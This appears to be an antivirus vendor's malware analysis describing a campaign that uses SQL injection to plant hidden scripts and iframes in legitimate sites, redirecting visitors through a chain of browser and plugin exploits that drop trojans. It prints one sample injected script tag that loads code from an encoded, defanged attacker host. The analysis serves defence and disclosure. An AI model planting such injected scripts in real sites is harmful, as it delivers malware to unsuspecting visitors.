My Bitdefender
  • 0 Shopping Cart


Facebook Twitter Google Plus


aprox 60 kb


The exploit doesn't manifest any obvious symptoms. It usually appears on clean sites trough SQL Injection attacks which insert an invisible iframe in the once clean code that leads the unconscious Internet surfer to an "outbreak" infected site.

This attack has a new approach. Here is an example of this kind of injection : <script src="hxxp://%76%63%63%64%2e%63%6e/"></script>. This leads to the infected site hxxp://

The mechanism behind the infected site is shown below.

Removal instructions:

It's always better to prevent : keep the antivirus updated, as well as any application that you might use.
Please let BitDefender disinfect your files.

Analyzed By

Daniel Chipiristeanu, virus researcher

Technical Description:

The mechanism used by this kind of malware spreading campaigns is rather simple and thus, effective. First it finds vulnerable sites and tries to inject infected code into their databases. This is usually done by "SQL Injection" that inserts malicious code into the previously clean sites. This is similar to the method used by the "Asprox" / "Damnec" Trojan.

The malicious intent is obvious since it modifies the user posted code on the Internet. Not surprisingly, the URL that the user unconsciously follows is used for infection.

After the stealthy redirection to the infected outbreak site, for example hxxp://, it checks for browser settings and tries different exploits to infect the user.

Here is a list of infection flow that was found on this website. They lead to each and other trough iframes.

The first step :

    * hxxp:// - sets a cookie which expires in 1000 days and checks for the User-Agent. If it's Internet Explorer then it leads to hxxp:// else it leads to hxxp:// These two check for the version of Flash Player and if it's "9" with subversion older than "115" it downloads a SWF file (Adobe Flash extension) with the name "i[subversion].swf" for the first one and "f[subversion].swf" for the second.  These are detected by BitDefender as Exploit.SWF.Gen. Then it points to another site that continues the infection hxxp://

    * hxxp:// just leads to hxxp://

    * hxxp:// is an encrypted script written in JavaScript detected as Trojan.Exploit.JS.RealPlr.S which acts as the engine of this infection vector. Basically it has an variable that holds the encrypted string, which is written in the html using the "document.write" feature after decryption.  It takes three steps until decoding the specific malicious javascript code as the string is encrypted with a) Base64 encoding b) xxtea encryption arithmetic algorithm c) conversion from UTF-8 to UTF-16.  After decryption, it leads to these links usually trough iframes :

  1. hxxp:// that contains an exploit for Snapshot Viewer for some versions of Microsoft Access. The exploit tries to download hxxp:// detected as Trojan.Dropper.Replacer.A
  2. hxxp://, which is similar to the one previously described, and leads to the same SWF files.
  3. If the "User Agent" is msie7 (Internet Explorer) it creates an invisible iframe hxxp://, which uses the MS06-014 - RDS.DataControl exploit in  Microsoft Data Access Component and downloads a file detected as Trojan.Dropper.Replacer.A.
  4. Lianzhong chat room (GLIEDown.IEDown.1) exploit in the found in hxxp:// (detected as Trojan.Exploit.JS.G) which downloads hxxp:// (Trojan.Dropper.Replacer.A).
  5. hxxp:// using "DownloadAndInstall" exploit downloads  hxxp:// (heuristicaly detected as Generic.Malware.SYBdld.1FBF30D9).
  6. RealPlayer exploit hxxp:// or hxxp:// that check for product version and downloads hxxp:// detected as Trojan.Dropper.Replacer.A.
  7. hxxp:// which is an vulnerability that affects the 'Update' method of the 'UUUpgrade.ocx' that can download a file onto the affected computer. The file was unavailable at time of analysis.